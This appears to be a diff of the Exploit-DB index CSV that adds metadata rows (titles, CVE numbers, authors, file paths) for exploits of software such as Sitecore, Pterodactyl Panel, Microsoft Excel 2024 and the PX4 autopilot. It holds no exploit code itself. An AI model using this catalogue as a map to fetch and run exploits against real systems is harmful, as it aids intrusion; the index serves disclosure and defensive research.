52340,exploits/linux/remote/52340.txt,"OneTrust SDK 6.33.0 - Denial Of Service (DoS)",2025-06-26,"Alameen Karim Merali",remote,linux,,2025-06-26,2025-06-26,0,CVE-2024-57708,,,,,
20496,exploits/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Remote Buffer Overflow (2)",2000-12-07,diman,remote,linux,,2000-12-07,2012-08-14,1,CVE-2001-0028;OSVDB-1689,,,,,https://www.securityfocus.com/bid/2099/info
39973,exploits/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution (Metasploit)",2016-06-17,Metasploit,remote,linux,443,2016-06-17,2016-06-17,1,,"Metasploit Framework (MSF)",,,,
24106,exploits/linux/remote/24106.txt,"Open WebMail 1.x/2.x - Remote Command Execution Variant",2004-05-10,Nullbyte,remote,linux,,2004-05-10,2013-01-14,1,OSVDB-4201,,,,,https://www.securityfocus.com/bid/10316/info
@ -11188,6 +11189,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22304,exploits/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,remote,multiple,,2012-10-28,2012-10-28,1,OSVDB-86562,"Metasploit Framework (MSF)",,,,
16308,exploits/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,remote,multiple,,2010-09-20,2011-03-06,1,OSVDB-64541,"Metasploit Framework (MSF)",,,,
19906,exploits/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",remote,multiple,,2000-05-10,2012-07-17,1,CVE-2000-0411;OSVDB-59348,,,,,https://www.securityfocus.com/bid/1187/info
52345,exploits/multiple/remote/52345.txt,"McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information",2025-06-26,"Keenan Scott",remote,multiple,,2025-06-26,2025-06-26,0,CVE-2022-1257,,,,,
38368,exploits/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",remote,multiple,,2013-03-08,2015-09-30,1,CVE-2013-5094;OSVDB-91133,,,,,https://www.securityfocus.com/bid/58401/info
37081,exploits/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",remote,multiple,,2012-04-16,2015-05-22,1,,,,,,https://www.securityfocus.com/bid/53015/info
31767,exploits/multiple/remote/31767.rb,"MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)",2014-02-19,Metasploit,remote,multiple,80,2014-02-19,2014-02-19,1,CVE-2014-1610;OSVDB-102630,"Metasploit Framework (MSF)",,,,
@ -11450,6 +11452,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23271,exploits/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,remote,multiple,,2003-10-22,2012-12-09,1,CVE-2003-1522;OSVDB-2680,,,,,https://www.securityfocus.com/bid/8869/info
47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple,,2019-09-06,2019-09-06,0,CVE-2019-11539,,,,,
47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,CVE-2019-11539,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/pulse_secure_cmd_exec.rb
52339,exploits/multiple/remote/52339.py,"PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)",2025-06-26,"Mohammed Idrees Banyamer",remote,multiple,,2025-06-26,2025-06-26,0,CVE-2025-5640,,,,,
32781,exploits/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",remote,multiple,,2009-02-09,2014-04-10,1,OSVDB-52156,,,,,https://www.securityfocus.com/bid/33676/info
22496,exploits/multiple/remote/22496.txt,"Python 2.2/2.3 - Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,remote,multiple,,2003-04-15,2012-11-05,1,,,,,,https://www.securityfocus.com/bid/7353/info
49585,exploits/multiple/remote/49585.py,"python jsonpickle 2.0.0 - Remote Code Execution",2021-02-24,"Adi Malyanker",remote,multiple,,2021-02-24,2021-02-24,0,,,,,,
@ -12334,6 +12337,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51264,exploits/multiple/webapps/51264.txt,"Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)",2023-04-05,"Andreas Finstad",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-23286,,,,,
12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple,,2010-05-23,,1,,,,,,
28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",webapps,multiple,,2006-08-03,2017-10-17,1,CVE-2006-4068;OSVDB-29777,,,,,https://www.securityfocus.com/bid/19333/info
52341,exploits/multiple/webapps/52341.py,"Pterodactyl Panel 1.11.11 - Remote Code Execution (RCE)",2025-06-26,Zen-kun04,webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-49132,,,,,
47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,,2019-08-21,2019-08-21,0,CVE-2019-11510,,,,,
33894,exploits/multiple/webapps/33894.txt,"Python CGIHTTPServer - Encoded Directory Traversal",2014-06-27,"RedTeam Pentesting",webapps,multiple,,2014-06-27,2014-06-27,1,CVE-2014-4650;OSVDB-108369,,,,,https://www.redteam-pentesting.de/advisories/rt-sa-2014-008
48146,exploits/multiple/webapps/48146.py,"qdPM < 9.1 - Remote Code Execution",2020-02-28,"Tobin Shields",webapps,multiple,,2020-02-28,2020-02-28,0,CVE-2020-7246,,,,,https://github.com/TobinShields/qdPM9.1_Exploit/blob/b135e99b54228740f84c6a821d0c56fdaa694797/qdPM9.1_exploit.py
@ -12388,6 +12392,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,,
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
52335,exploits/multiple/webapps/52335.py,"Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI",2025-06-15,"Cristian Branet",webapps,multiple,,2025-06-15,2025-06-15,0,CVE-2025-49619,,,,,
@ -12397,6 +12402,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10
52346,exploits/multiple/webapps/52346.py,"Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE)",2025-06-26,"Huseyin Mardinli",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2019-9978,,,,,
48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
@ -43422,6 +43428,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16462,exploits/windows/remote/16462.rb,"freeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-04-27,1,CVE-2006-2407;OSVDB-25569,"Metasploit Framework (MSF)",,,http://www.exploit-db.comfreeFTPd.exe,
1330,exploits/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,remote,windows,21,2005-11-16,2016-10-30,1,OSVDB-20909;CVE-2005-3684;CVE-2005-3683,,,,http://www.exploit-db.comfreeFTPd.exe,
23079,exploits/windows/remote/23079.txt,"freeFTPd 1.2.6 - Remote Authentication Bypass",2012-12-02,kingcope,remote,windows,,2012-12-02,2016-12-21,1,CVE-2012-6066;OSVDB-88006,,,,,
52342,exploits/windows/remote/52342.txt,"freeSSHd 1.0.9 - Denial of Service (DoS)",2025-06-26,"Fernando Mengali",remote,windows,,2025-06-26,2025-06-26,0,CVE-2024-0723,,,,,
1787,exploits/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",remote,windows,22,2006-05-14,2016-12-03,1,OSVDB-25463;CVE-2006-2407,,,,http://www.exploit-db.comfreeSSHd.exe,http://www.frsirt.com/english/advisories/2006/1786
16461,exploits/windows/remote/16461.rb,"freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2016-12-03,1,CVE-2006-2407;OSVDB-25463,"Metasploit Framework (MSF)",,,http://www.exploit-db.comfreeSSHd.exe,
8295,exploits/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,remote,windows,22,2009-03-26,2016-12-03,1,OSVDB-54362;CVE-2008-6899,,,,,http://www.bmgsec.com.au/advisory/32/
@ -44136,6 +44143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45502,exploits/windows/remote/45502.txt,"Microsoft Edge - Sandbox Escape",2018-09-27,"Google Security Research",remote,windows,,2018-09-27,2018-09-28,1,CVE-2018-8469;CVE-2018-8468;CVE-2018-8463,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1598&can=1&q=&sort=-modified%20-id&colspec=ID%20Status%20Owner%20Summary%20Modified&desc=5
35573,exploits/windows/remote/35573.txt,"Microsoft Excel - Remote Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",remote,windows,,2011-04-12,2014-12-27,1,CVE-2011-0104;OSVDB-71761,,,,,https://www.securityfocus.com/bid/47245/info
28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,remote,windows,,2006-07-06,2013-09-17,1,CVE-2006-3431;OSVDB-27053,,,,,https://www.securityfocus.com/bid/18872/info
52343,exploits/windows/remote/52343.py,"Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)",2025-06-26,nu11secur1ty,remote,windows,,2025-06-26,2025-06-26,0,CVE-2025-47165,,,,,
47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25,2019-07-05,2019-07-05,0,CVE-2007-0213,,ENGLISHMANSDENTIST,,,
49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - Server-Side Request Forgery",2021-03-14,F5,remote,windows,,2021-03-18,2021-11-01,0,CVE-2021-26855,,,,,https://f5.pm/go-62102.html
48153,exploits/windows/remote/48153.py,"Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution",2020-03-02,Photubias,remote,windows,,2020-03-02,2020-03-02,0,CVE-2020-0688,,,,,

Can't render this file because it is too large.